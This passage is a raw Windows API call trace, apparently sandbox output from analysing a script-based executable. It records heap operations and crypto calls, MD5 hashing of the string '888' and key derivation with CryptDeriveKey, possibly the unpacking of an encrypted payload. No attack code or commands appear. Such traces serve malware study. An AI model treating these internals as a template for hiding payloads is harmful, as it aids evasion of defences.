0x2e543a0 [0216.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0216.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0216.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0216.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0216.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0216.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0216.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0216.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0216.354] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0216.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0216.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0216.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0216.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0216.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0216.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0216.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0216.355] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0216.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0216.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0216.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0216.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0216.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0216.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0216.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0216.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0216.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0216.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0216.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.356] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0216.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0216.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0216.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0216.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0216.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.357] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0216.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.357] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0216.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50ba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0216.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0216.357] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0216.358] CryptHashData (hHash=0xa87290, pbData=0x2e54e38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0216.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0216.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0216.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0216.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0216.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0216.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0216.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0216.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0216.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0216.361] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0216.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.361] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.361] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0216.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0216.361] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.362] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0216.362] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0216.362] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0216.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c80 [0216.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c80, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0216.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0216.362] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0216.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0216.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0216.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0216.363] 